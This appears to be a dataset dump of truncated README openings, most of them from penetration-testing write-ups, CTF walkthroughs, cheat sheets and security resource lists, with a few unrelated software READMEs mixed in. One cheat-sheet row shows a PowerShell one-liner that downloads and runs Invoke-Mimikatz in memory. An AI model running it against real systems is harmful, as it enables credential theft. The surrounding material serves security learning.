text
stringlengths
9
334k
# NerdHerd Hack your way into this easy/medium level legendary TV series "Chuck" themed box! [NerdHerd](https://tryhackme.com/room/nerdherd) ## Topic's - Network Enumeration - Linux Enumeration - FTP Enumeration - SMB Enumeration - Steganography - Cryptography - Base64 - Vigenère - CVE-2017-16995 - Linux Kernel...
# Bratarina ## Table of Contents * [Summary](#summary) * [Enumerate](#enumerate) * [Ports](#ports) * [Services](#services) * [SSH](#ssh) * [SMTP](#smtp) * [HTTP](#http) * [SMB](#smb) * [OS](#os) * [Nmap OS Discovery Scan](#nmap-os-discovery-scan) * [Nmap OS Discovery Scan via SMB](#nmap-o...
### Proving Grounds Writeups - AD:Heist, Hutch, Vault, Resourced - BOF:Malbec - WordPress:SunsetMidnight - SQLi:Butch - LibreOffice:Hepet, Craft - SeImpersonatePrivilege:Craft - container:Sirol #### Exploits - [WordPress Core < 5.2.3](https://www.exploit-db.com/exploits/47690) - [XAMPP 7.4.3 - Local Privilege Escala...
# Awesome-PenTest-Practice ### Tips, Materials and commands that you can use in CTFs, RealPenTest and even Bug Bounty! #### My LinkedIn: https://www.linkedin.com/in/joas-antonio-dos-santos/ >> Contains more than 170 articles by Red and Blue Team -------------------------------------------------------------------------...
# eJPT Notes - eLearnSecurity Junior Penetration Tester Certificate Notes ![Cert Header](certHeader.png) ### NOTE - **I am not - affiliated with eLearnSecurity in any way and these notes do not guarantee that you pass.** - Replace 10.10.10.2 with the proper IP based on your situation ## What is this? - The notes be...
<h1 align="center">mksub <a href="https://twitter.com/intent/tweet?text=mksub%20-%20Generate%20tens%20of%20thousands%20of%20subdomain%20combinations%20in%20a%20matter%20of%20seconds%0Ahttps%3A%2F%2Fgithub.com%2Ftrickest%2Fmksub&hashtags=bugbounty,bugbountytips,infosec"><img src="https://img.shields.io/badge/Tweet--ligh...
<details> <summary><strong>Support HackTricks and get benefits!</strong></summary> Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLAN...
.:: 0xR ::. .:: Reverse Shell Cheat Sheet Tool ::. .:: cyber-warrior.org ::. #Install Note Clone the repository: git clone https://github.com/0xR0/shellver.git Then...
# Awesome Bug Bounty [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) A comprehensive curated list of Bug Bounty Programs and write-ups from the Bug Bounty hunters. ## Table of Contents - [Getting Started](#getti...
# Pentest Environment Deployer | [![Build Status](https://travis-ci.org/Sliim/pentest-env.svg?branch=master)](https://travis-ci.org/Sliim/pentest-env) This repo provides an easy way to deploy a clean and customized pentesting environment with Kali linux using vagrant and virtualbox. ## Requirements I assume you are ...
# Dictionary-Of-Pentesting ## 简介 收集一些常用的字典,用于渗透测试、SRC漏洞挖掘、爆破、Fuzzing等实战中。 收集以实用为原则。目前主要分类有认证类、文件路径类、端口类、域名类、无线类、正则类。 涉及的内容包含设备默认密码、文件路径、通用默认密码、HTTP参数、HTTP请求头、正则、应用服务默认密码、子域名、用户名、系统密码、Wifi密码等。 该项目计划持续收集,也欢迎感兴趣的大佬一起来完善。可直接提交PR,也可以提建议到issue。 ## 更新记录 **2020.11.23** 1. 增加ctf字典。 2. 增加摄像rtsp默认路径和默认用户名和密码 **2020.11.1...
# awesome-web-hacking This list is for anyone wishing to learn about web application security but do not have a starting point. You can help by sending Pull Requests to add more information. If you're not inclined to make PRs you can tweet me at `@infoslack` Table of Contents ================= * [Books](#books) ...
# All-in-one_BugBounty_PDF_bundles ### All-in-one_PDF [![Twitter](https://img.shields.io/badge/twitter-@1ndianl33t-blue.svg)](https://twitter.com/1ndianl33t) [ All-in-one-Recon-by_@1ndianl33t ](https://drive.google.com/file/d/1uBTra6_jwhLnZALJVp9hmHaty2pBBUH2/view?usp=drivesdk) [![Twitter](https://img.shields.io/ba...
<div align="center"> <img width="500" height="350" src="iot_awesome_logo.svg" alt="Awesome"> <br /> </div> # Awesome Embedded and IoT Security [![Awesome](https://awesome.re/badge.svg)](https://awesome.re) > A curated list of awesome resources about embedded and IoT security. The list contains software and hardwar...
<h1 align="center"> <br> <a href=""><img src="https://user-images.githubusercontent.com/13212227/104400983-a5cc0a00-5596-11eb-8aeb-81c747f26663.png" width="500px"></a> <br> <img src="https://img.shields.io/github/languages/top/hahwul/MobileHackersWeapons?style=flat"> <img src="https://img.shields.io/github/l...
# Odin #1 - CTF Available on VulnHub: https://www.vulnhub.com/entry/odin-1,619/ ## IP Discovery ``` $ sudo netdiscover -r 192.168.1.0/16 ``` ``` Currently scanning: Finished! | Screen View: Unique Hosts 0 Captured ARP Req/Rep packets, from 0 hosts. Total size: 0 ____________________________________________...
<p align='center'> <img src="https://i.imgur.com/n2U6nVH.png" alt="Logo"> <br> <a href="https://github.com/Tuhinshubhra/CMSeeK/releases/tag/v.1.1.2"><img src="https://img.shields.io/badge/Version-1.1.2-brightgreen.svg?style=style=flat-square" alt="version"></a> <a href="https://github.com/Tuhinshubhra/CMSeeK/"...
# Advanced Web Attacks & Exploitation All efforts for the AWAE course and preparation for the Offensive Security Web Expert (OSWE) exam. ## Study Strategy * Several rounds of course content * First round: * Watch videos * Read text and take good notes * Complete the main exercises * Second round: * Wat...
# Awesome Threat Detection and Hunting [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) > A curated list of awesome threat detection and hunting resources ## Contents - Threat Detection and Hunting - 🔨 [Too...
# iOS Penetration Testing Cheat Sheet This is more of a checklist for myself. May contain useful tips and tricks. Everything was tested on Kali Linux v2023.1 (64-bit) and iPhone 7 with iOS v13.4.1 and unc0ver jailbreak v8.0.2. Check [3uTools](https://www.3u.com) if you want to jailbreak your iOS device. I have no [l...
### Resources For BugBounty Hunters Forums 1. BugBountyForum 2. BugBountyWorld Practise : 1. https://www.hacksplaining.com/lessons 2. https://www.amanhardikar.com/mindmaps/Practice.html 3. http://www.pentesterlabs.com/ 4. https://attackdefense.com/ 5. https://www.hackthebox.eu/ 6. https://picoctf.com/ 7. htt...
<p align='center'> <img src="https://i.imgur.com/n2U6nVH.png" alt="Logo"> <br> <img src="https://img.shields.io/badge/Version-1.0.2%20Beta-brightgreen.svg?style=style=flat-square" alt="version"> <img src="https://img.shields.io/badge/python-3-orange.svg?style=style=flat-square" alt="Python Version"> <img sr...
# PenTest CheatSheets This is a repo for pentest cheat sheets which I have found useful!! 1. https://pentestbook.six2dez.com/others/web-checklist is pentest `#Checklist`. 2. https://github.com/trimstray/the-book-of-secret-knowledge#hackingpenetration-testing-toc is a complete cheatsheet. `#CheatSheet` 3. https://...
# eJPT some eLearnSecurity eJPT exam preparation materials ### nmap + fping hosts discovery fping: ```bash fping -a -g 10.10.10.0/24 2> fping.txt ``` hosts discovery nmap: ```bash nmap -sn 10.10.10.0/24 > hosts.txt nmap -sn -T4 10.10.30.0/24 -oG - | awk '/Up$/{print $2}' ``` open ports scan (save to file): ```bash n...
### IP `10.10.137.94` # Enumeration ### nmap `nmap -sC -sV 10.10.137.94 -oN init.nmap` ``` Nmap scan report for 10.10.137.94 Host is up (0.12s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp filtered http ``` Only port 80 is open. I also ran a full port-scan here, but nothing else show...
# macOS Red Teaming <details> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>�...
# Hack The Box [Hack The Box](https://www.hackthebox.eu) is an online platform allowing you to test and advance your skills in cyber security. **Reversing 4/10** | Title | Points | Status | WriteUp | | :---: | :---: | :---: | :---: | | Crack This! | 80 | :disappointed_relieved: | | | The Art of Reversing | 40 | :disa...
## A Repository of resources to learn Cyber Security Topics From: I will try to break the resources in Major Categories and then break them down into more niche topics when needed :). Please feel free to make a pull request with a resource you wanna add or if you wanna make some Contributions as well. Also this libra...
## <span id="head1"> Penetration_Testing_POC</span> 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 - [ Penetration_Testing_POC](#head1) - [ 请善用搜索[`Ctrl+F`]查找](#head2) - [IOT Device&Mobile Phone](#head3) - [Web APP](#head4) - [ 提权辅助相关](#head5) - [ PC](#head6) - [ tools-小工具集合](#head7) - [ 文章/书籍/教程相关](#head8) - [ 说明](#head9)...
# One-Liners [![Awesome](https://awesome.re/badge-flat2.svg)](https://awesome.re) ###### Thanks to all who create these Awesome One Liners❤️ ---------------------- ![image](https://user-images.githubusercontent.com/75373225/180003557-59bf909e-95e5-4b31-b4f8-fc05532f9f7c.png) --------------------------- # Subdomain Enu...
<h1 align="center"> <br> <a href="https://github.com/HACKE-RC/webdork"><img src="https://beeimg.com/images/f36886119494.png" alt="webdork" width="600" height="300"></a> <br> ReporterX v1.0 beta <br> </h1> <p align="center">Report writing made easy.</p> # ReporterX Python tool to automate report writing with...
<p align="center"><img src="src/banner.png" alt="Banner"></img></p> <p align="center">Creator: <a href="https://app.hackthebox.eu/profile/1190">egre55</a></p> # Personal thoughts Easy peasy lemon squeezy; just need to do a little bit of enumeration, even you don't need any special tenhniques for this box. I tried to e...
# [所有收集类项目](https://github.com/alphaSeclab/all-my-collection-repos) # Injection - PE注入、DLL注入、进程注入、线程注入、代码注入、Shellcode注入、ELF注入、Dylib注入,当前包括400+工具和350+文章,根据功能进行了粗糙的分类 - [English Version](https://github.com/alphaSeclab/injection-stuff/blob/master/Readme_en.md) # 目录 - [PE注入](#81a3947baa3f99adaf73a8f9766e48fa) -> [...
![alt text](https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png "WPScan - WordPress Security Scanner") [![Gem Version](https://badge.fury.io/rb/wpscan.svg)](https://badge.fury.io/rb/wpscan) [![Build Status](https://travis-ci.org/wpscanteam/wpscan.svg?branch=master)](https://travis-ci.or...
## Information Gathering * [whois](https://www.tecmint.com/whois-command-get-domain-and-ip-address-information/)&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPZPTF4VDCZFD3CFVAK6WVY3S)](https://www.youtube.com/watch?v=mOrWk-80ObA) ``` whois goo...
# Microsoft Authentication Library (MSAL) for Python | `dev` branch | Reference Docs | # of Downloads per different platforms | # of Downloads per recent MSAL versions | |---------------|---------------|----------------------------------------|-----------------------------------------| [![Build status](https://github...
Hacking/Penetrating tester bookmark collection ============================================== This is a collection of Pentest/Hacker sites. It is originally created by Jason Haddix. ## Blogs worth it What the title says. There are a LOT of pentesting blogs, these are the ones i monitor constantly and value in the a...
# API Key Leaks > The API key is a unique identifier that is used to authenticate requests associated with your project. Some developers might hardcode them or leave it on public shares. ## Summary - [Tools](#tools) - [Exploit](#exploit) - [Google Maps](#google-maps) - [Algolia](#algolia) - [AWS Access K...
--- title: 'WPScan' category: 'scanner' type: "CMS" state: "released" appVersion: "v3.8.19" usecase: "Wordpress Vulnerability Scanner" --- ![WPScan Logo](https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png) <!-- SPDX-FileCopyrightText: 2021 iteratec GmbH SPDX-License-Identifier: Apach...
![BBR](https://raw.githubusercontent.com/BugBountyResources/Resources/master/BBR%20alpha%20logo.png) [![Come chat with us!](https://badges.gitter.im/USER/REPO.png)](https://gitter.im/BBRteam/Lobby "Gitter Chat") # Bug Bounty Resources Storehouse of resources related to Bug Bounty Hunting collected from different s...
# Hacking-Resources --- This repository contains some resources for ethical hackers penetration tester 😊 This may contain some files, tools, books, and links that need to be used for good purposes only. Do not do any illegal work using these sources. This is only for keeping some resources and topics in one-place ...
### TensorFlow Makefile The recommended way to build TensorFlow from source is using the Bazel open-source build system. Sometimes this isn't possible. For example, if you are building for iOS, you currently need to use the Makefile. - The build system may not have the RAM or processing power to support Bazel. - Ba...
## Arthas ![arthas](site/src/site/sphinx/arthas.png) [![Build Status](https://travis-ci.org/alibaba/arthas.svg?branch=master)](https://travis-ci.org/alibaba/arthas) [![codecov](https://codecov.io/gh/alibaba/arthas/branch/master/graph/badge.svg)](https://codecov.io/gh/alibaba/arthas) ![maven](https://img.shields.io/ma...
# Awesome Malware Analysis [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) A curated list of awesome malware analysis tools and resources. Inspired by [awesome-python](https://github.com/vinta/awesome-python) an...
<p align="center"> <img src="https://user-images.githubusercontent.com/63926014/209046028-a851de73-fcf5-4cf3-a7bd-297148f5d986.png"> Hey, I'm E.T. I'm a cybersecurity consultant with experience & interests in security compliance, cloud security, and penetration testing. <br> <img src="https://user-images.githubuserco...
# Jeff Can you hack Jeff's web server? - [Jeff](https://tryhackme.com/room/jeff) ## Appendix archive Password: `1 kn0w 1 5h0uldn'7!` ## Task 1 Get Root This machine may take upto 5 minutes to fully deploy. Get user.txt and root.txt. This is my first ever box, I hope you enjoy it. If you find yourself brute forc...
<p align="center"> <a href="https://wpscan.org/"> <img src="https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png" alt="WPScan logo"> </a> </p> <h3 align="center">WPScan</h3> <p align="center"> WordPress Vulnerability Scanner <br> <br> <a href="https://wpscan.org/" title=...
# oswe_preparation ## Curated List The following Links are curated from Below Sources. | Name | URL | | ------ | ------ | | M507 | [Github](https://github.com/M507/AWAE-Preparation/) | | Z-r0crypt OSWE/AWAE Preparation | [Blog](https://z-r0crypt.github.io/blog/2020/01/22/oswe/awae-preparation/) | | AWAE - OSWE ...
# Airbnb React/JSX Style Guide *A mostly reasonable approach to React and JSX* This style guide is mostly based on the standards that are currently prevalent in JavaScript, although some conventions (i.e async/await or static class fields) may still be included or prohibited on a case-by-case basis. Currently, anythi...
# OSWE-Prep An OSWE Guide #### WriteUps <https://stacktrac3.co/oswe-review-awae-course/> <https://github.com/wetw0rk/AWAE-PREP]> <https://github.com/timip/OSWE> <https://forum.hackthebox.eu/discussion/2646/oswe-exam-review-2020-notes-gifts-inside> <https://anchor.fm/dayzerosec/episodes/Offensive-Securitys-OSWEAWA...
## Arthas ![arthas](site/src/site/sphinx/arthas.png) [![Build Status](https://travis-ci.org/alibaba/arthas.svg?branch=master)](https://travis-ci.org/alibaba/arthas) [![codecov](https://codecov.io/gh/alibaba/arthas/branch/master/graph/badge.svg)](https://codecov.io/gh/alibaba/arthas) [![maven](https://img.shields.io/m...
# wpscan-analyze Analyzes wpscan json output and checks for vulnerabilities [![Linux and macOS Build Status](https://travis-ci.org/lukaspustina/wpscan-analyze.svg?branch=master)](https://travis-ci.org/lukaspustina/wpscan-analyze) [![codecov](https://codecov.io/gh/lukaspustina/wpscan-analyze/branch/master/graph/badge....
## Title: OWASP ModSecurity Core Rule Set einbinden ### Was machen wir? Wir binden das OWASP ModSecurity Core Rule Set in unseren Apache Webserver ein und merzen Fehlalarme aus. ### Warum tun wir das? Die Web Application Firewall ModSecurity, wie wir sie in Anleitung Nummer 6 eingerichtet haben, besitzt noch beinah...
# Cyber Security Community DSC - DYPCOE Hello security researchers this repository is built in a way which guides you through the initial learning and basics of Cyber Security in web application ### Note Before we Dig in: ** Information provided on here is for educational purposes only. The communtiy is no way respon...
# Node.js Node.js is an open-source, cross-platform JavaScript runtime environment. For information on using Node.js, see the [Node.js website][]. The Node.js project uses an [open governance model](./GOVERNANCE.md). The [OpenJS Foundation][] provides support for the project. Contributors are expected to act in a c...
# Web Enum Quick Reference ## Contents - [Web Enum Quick Reference](#web-enum-quick-reference) * [Contents](#contents) * [HTTP and HTTPS Checklist](#http-and-https-checklist) * [Scan for sub directories and pages](#scan-for-sub-directories-and-pages) + [Wordlists](#wordlists) + [Scanning Tools](#scanni...
# security-scripts A collection of security related Python and Bash shell scripts, mainly revolving around testing hosts for security vulnerabilities. For the shell scripts no fancy programming framework is required, all that is needed is a Bash shell. Note that it is highly recommended to use `analyze_hosts.py` as i...
# WiFi Penetration Testing Cheat Sheet This is more of a checklist for myself. May contain useful tips and tricks. Everything was tested on Kali Linux v2021.4 (64-bit) and WiFi Pineapple Mark VII Basic with the firmware v1.0.2. Everything was tested on Kali Linux v2021.4 (64-bit) and WiFi Pineapple NANO with the fir...
This repo is for the demos of JNDI injection series: https://medium.com/bugbountywriteup/jndi-injection-series-rmi-vector-1-31044f782daa https://medium.com/bugbountywriteup/jndi-injection-series-rmi-vector-dynamic-class-loading-from-remote-url-28dcbf9cee27 https://medium.com/bugbountywriteup/jndi-injection-series-rm...
<p align="right">IT'S CURRENTLY A WIP - WORK IN PROGRESS</p> # "Zero to Hero" "No Bull$h1t" em Segurança Cibernética Cursos para fazer um "Zero to Hero" em Cyber Segurança **sem marketing**, vai ter que: - estudar muito (estamos falando de um "Hero" né?) - estudar coisas "não técnicas" e "não convencionais" (Qua...
# Learn365 This repository contains all the information shared during my Learn 365 Challenge. Learn 365 is a challenge to keep the learning spirit going on and challenge myself to learn something daily for the whole year, it can be anything from infosec to general life. Follow me on Twitter for Regular Updates: [Anubh...
# 所有收集类项目: - [收集的所有开源工具](https://github.com/alphaSeclab/sec-tool-list): 超过18K, 包括Markdown和Json两种格式 - [逆向资源](https://github.com/alphaSeclab/awesome-reverse-engineering): IDA/Ghidra/x64dbg/OllDbg/WinDBG/CuckooSandbox/Radare2/BinaryNinja/DynamoRIO/IntelPin/Frida/QEMU/Android安全/iOS安全/Window安全/Linux安全/macOS安全/游戏Hacking/Boot...
# haise ## Internal Network Pentest Framework ![](https://github.com/syedumerqadri/haise/blob/master/image.jpg) ## Internal Penetration Testing: An Internal Penetration Test differs from a vulnerability assessment in that it actually exploits the vulnerabilities to determine what information is actually exposed. An ...
Updated posted is at https://ishaqmohammed.me/posts/pwk-oscp-preparation-roadmap/ ### My roadmap for preparing for [OSCP](https://www.offensive-security.com/pwk-oscp/), anyone is free to use this and also feedback and contributions are welcome ### **101s(Enumeration)** **1. DNS 101 (Basics of DNS and DNS enumaera...
| **Command** | **Description** | | --------------|-------------------| | `Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1` | Download a file with PowerShell | | `IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')` | Execute a file in memory using PowerShell | | `...
# Easy Peasy Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob. [Easy Peasy](https://tryhackme.com/room/easypeasyctf) ## Topic's - Network Enumeration - Web Enumeration - Cryptography ...
## Enumeration - Ports and its purposes. https://sushant747.gitbooks.io/total-oscp-guide/list_of_common_ports.html ## Banner grabbing to check on all ports ``` nc -nv <IP> <port Number> -C for CLRF ``` ``` telnet <IP> <PORT number> ``` #Nmap scan on all ports ``` nmap -sC -sV -p- -oA full 127.0.0.1 nmap -sU -p- ...
# Track Awesome Cyber Security University Updates Daily 🎓 Because Education should be free. Contributions welcome! 🕵️ [🏠 Home](/README.md) · [🔍 Search](https://www.trackawesomelist.com/search/) · [🔥 Feed](https://www.trackawesomelist.com/brootware/awesome-cyber-security-university/rss.xml) · [📮 Subscribe](http...
--- title: "CMSeeK" category: "scanner" type: "CMS" state: "released" appVersion: "v.1.1.3" usecase: "Automation of the process of detecting the Joomla CMS and its core vulnerabilities" --- <!-- SPDX-FileCopyrightText: the secureCodeBox authors SPDX-License-Identifier: Apache-2.0 --> <!-- .: IMPORTANT! :. -----------...
<h1 align="center">Resolvers <a href="https://twitter.com/intent/tweet?text=Trickest%20Resolvers%20-%20The%20most%20exhaustive%20list%20of%20reliable%20DNS%20resolvers%20%40trick3st%0A%0Ahttps%3A%2F%2Fgithub.com%2Ftrickest%2Fresolvers&hashtags=bugbounty,bugbountytips,infosec"><img src="https://img.shields.io/badge/Twee...
# OSWA Experience And Exam Preparation Guide My Offensive Security OSWA certification experience and my personal opinion what helps in preparation for the exam. You think I missed something or have a question? Just reach out by creating an issue or sending me message on [Twitter](https://twitter.com/rnd_infosec_guy) #...
# networking ## The Code - Try Harder - Progress is not moving forward on the problem. It is learning more. If you are learning ways that don't work, you are progressing and don't qualify to ask/look for hints. - Applications break on bad inputs, not on good ones. Developers forget to consider bad inputs or edge ...
# Swagger Code Generator [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen) [![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https:/...
<h1 align="center"> <img src="static/httpx-logo.png" alt="httpx" width="200px"> <br> </h1> <p align="center"> <a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/license-MIT-_red.svg"></a> <a href="https://goreportcard.com/badge/github.com/projectdiscovery/httpx"><img src="https:...
<p align="center"> <a href="https://github.com/trimstray/the-book-of-secret-knowledge"> <img src="https://github.com/trimstray/the-book-of-secret-knowledge/blob/master/static/img/the-book-of-secret-knowledge-preview.png" alt="Master"> </a> </p> <p align="center">"<i>Knowledge is powerful, be careful how you us...
<h1 align="center"> <br> <a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a> <br> ReconFTW <br> </h1> <h4 align="center">A simple bash script for full recon</h4> <p align="center"> <a href="https://github.com/six2dez/...
# Red Team Arsenal&nbsp; [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Red%20Team%20Arsenal%20(RTA)%20-%20An%20intelligent%20scanner%20to%20detect%20security%20vulnerabilities%20in%20company%27s%20layer%207%20assets&url=https://github.com/flipkart-...
# [Django REST framework][docs] [![build-status-image]][travis] [![coverage-status-image]][codecov] [![pypi-version]][pypi] [![Gitter](https://badges.gitter.im/tomchristie/django-rest-framework.svg)](https://gitter.im/tomchristie/django-rest-framework?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge) **Awesome...
# Develpy boot2root machine for FIT and bsides Guatemala CTF [Develpy](https://tryhackme.com/room/bsidesgtdevelpy) ## Topic's * Network Enumeration * Code Injection (RCE) * Exploiting Crontab ## Task 1 Develpy read user.txt and root.txt ``` kali@kali:~/CTFs/tryhackme/Develpy$ sudo nmap -A -sS -sC -sV -O -p- 10.1...
# Quick and easy flasher/updater for [Marauder](https://github.com/justcallmekoko/ESP32Marauder) ESP32-WROOM! ## This flasher/updater will work for any ESP32-WROOM chip or the v4 OEM Marauder. Looking for a Linux/OS X version? [Check out SkeletonMan's Python edition!](https://github.com/SkeletonMan03/FZEasyMarauderFl...
# Getting Started in Cybersecurity and Hacking ## Introduction This guide aims to provide easy-to-access resources for individuals interested in learning more about Technology, Cybersecurity, Ethical hacking, and Bug Bounty. Below, you will find organized links and resources related to each topic for your convenience. ...
<h1 align="center"> 👑 What is KingOfBugBounty Project </h1> Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the...
<!-- MANPAGE: BEGIN EXCLUDED SECTION --> <div align="center"> [![YT-DLP](https://raw.githubusercontent.com/yt-dlp/yt-dlp/master/.github/banner.svg)](#readme) [![Release version](https://img.shields.io/github/v/release/yt-dlp/yt-dlp?color=brightgreen&label=Download&style=for-the-badge)](#installation "Installation") [...
# SSTI ![](ssrf.png) ## What is SSTI ? - Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side. <a href="https://portswigger.net/web-security/server-side-template-injection">Portswigger Detailed explan...
<p align="center"> <a href="https://wpscan.org/"> <img src="https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png" alt="WPScan logo"> </a> </p> <h3 align="center">WPScan</h3> <p align="center"> WordPress Vulnerability Scanner <br> <br> <a href="https://wpscan.org/" title=...
<p align="center"> <a href="https://github.com/trimstray/the-book-of-secret-knowledge"> <img src="https://github.com/trimstray/the-book-of-secret-knowledge/blob/master/static/img/the-book-of-secret-knowledge-preview.png" alt="Master"> </a> </p> <p align="center">"<i>Knowledge is powerful, be careful how you us...
[![Build Status](https://travis-ci.org/ytdl-org/youtube-dl.svg?branch=master)](https://travis-ci.org/ytdl-org/youtube-dl) youtube-dl - download videos from youtube.com or other video platforms - [INSTALLATION](#installation) - [DESCRIPTION](#description) - [OPTIONS](#options) - [CONFIGURATION](#configuration) - [OUTP...
# Dictionary-Of-Pentesting ## 简介 收集一些常用的字典,用于渗透测试、SRC漏洞挖掘、爆破、Fuzzing等实战中。 收集以实用为原则。目前主要分类有认证类、文件路径类、端口类、域名类、无线类、正则类。 涉及的内容包含设备默认密码、文件路径、通用默认密码、HTTP参数、HTTP请求头、正则、应用服务默认密码、子域名、用户名、系统密码、Wifi密码等。 该项目计划持续收集。 ## 更新记录 **2021.06.06** 1. 增加SuperWordlist的用户名和密码字典。包括Tomcat、PMA、DEV等密码字典,还有CN、EN邮箱用户名、TOP20管理用户名。 2. 200万子域名字...
# CyberTruckChallenge22 Android security workshop taught at the CyberTruck Challenge 2022 (Michigan USA). Further info at https://www.cybertruckchallenge.org ## Description A new mobile remote keyless system "CyberTruck" has been implemented by one of the most well-known car security companies "NowSecure Mobile Vehi...
# Venom ![venom](venom.png) #### Offensive Security Framework for Vulnerability Scanning & Pentesting ![os](https://img.shields.io/badge/OS-Linux,%20Windows-green.svg) [![pythonver](https://img.shields.io/badge/python-3.6%2B-green.svg)](https://www.python.org/downloads/release/python-3614) [![License: GPLV3](https:/...
# Hacking Resources CTF chall write-ups, files, scripts etc to go with my video walkthroughs **[HERE](https://www.youtube.com/@_CryptoCat)** A challenge that takes 10 hours to solve, takes 10 minutes to explain :) # CTF **[CTFTime](https://ctftime.org)**<br> **[OverTheWire](https://overthewire.org/wargames)**<br> **[...
# A Red-Teamer diaries <p align="center"> <img src="https://www.welivesecurity.com/wp-content/uploads/2014/05/rooftop-1024x576.png"/> </p> Publicly accessible notes about my pentesting/red teaming experiments tested on several controlled environments/infrastructures that involve playing with various tools and techn...
# Hacking-Cheatsheet In this repo I collect all commands, links, techniques and tricks I found during my work as pentester, hacker, OSCP student and hack the box fan. # Basic Linux stuff you may need Keyword search in man pages: ```bash man -k <KEYWORD> ``` Alternatively: ```bash apropos <KEYWORD> ``` ## Find stuff `...
# attack_tool ### 1.dirmap web目录扫描工具 https://github.com/H4ckForJob/dirmap dirmap的安装指南 ```git clone https://github.com/H4ckForJob/dirmap.git && cd dirmap python3 -m pip install -r requirement.txt python3 dirmap.py -i http://192.168.31.200 -lcf ``` dirmap的使用方法 ``` python3 dirmap.py -i https://target.com -lcf pytho...
# Stocker - HackTheBox - Writeup Linux, 20 Base Points, Easy ![info.JPG](images/info.JPG) ## Machine ![Stocker.JPG](images/Stocker.JPG) ## TL;DR To solve this machine, we start by using `nmap` to enumerate open services and find ports `22`, and `80`. ***User***: Discovered the virtual host `dev.stocker.htb` and ...
# File Inclusion > The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. > The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the ...
# Retro New high score! [Retro](https://tryhackme.com/room/retro) ## Topic's - Network Enumeration - Web Enumeration - Web Poking - CVE-2017-0213 - Windows COM Aggregate Marshaler/IRemUnknown2 ## Appendix archive Password: `1 kn0w 1 5h0uldn'7!` ## Pwn Can you time travel? If not, you might want to think about t...
# Introduction to Hacking Library The goal of this library is to create an archive of useful tools and how to use them, mostly for: - Hacking - Pentests - Security Remember, this is only a guide, use the knowledge here wisely and at your own risk. Have fun! # Analysis Websites ## IPOK A colection of online tool...
# Breadcrumbs - HackTheBox - Writeup Windows, 40 Base Points, Hard ## Machine ![‏‏Breadcrumbs.JPG](images/Breadcrumbs.JPG) ## Breadcrumbs Solution ### User 1 Let's start with ```nmap``` scanning: ```console ┌─[evyatar@parrot]─[/hackthebox/Breadcrumbs] └──╼ $ nmap -sC -sV -oA nmap/Breadcrumbs 10.10.10.228 Startin...
# BlueTeam-Tools <p align="center"> <img src="https://user-images.githubusercontent.com/100603074/210680535-40d8c113-2336-4417-bdb4-4825a7477164.png" height="300"> </p> This github repository contains a collection of **65+** **tools** and **resources** that can be useful for **blue teaming activities**. Some of th...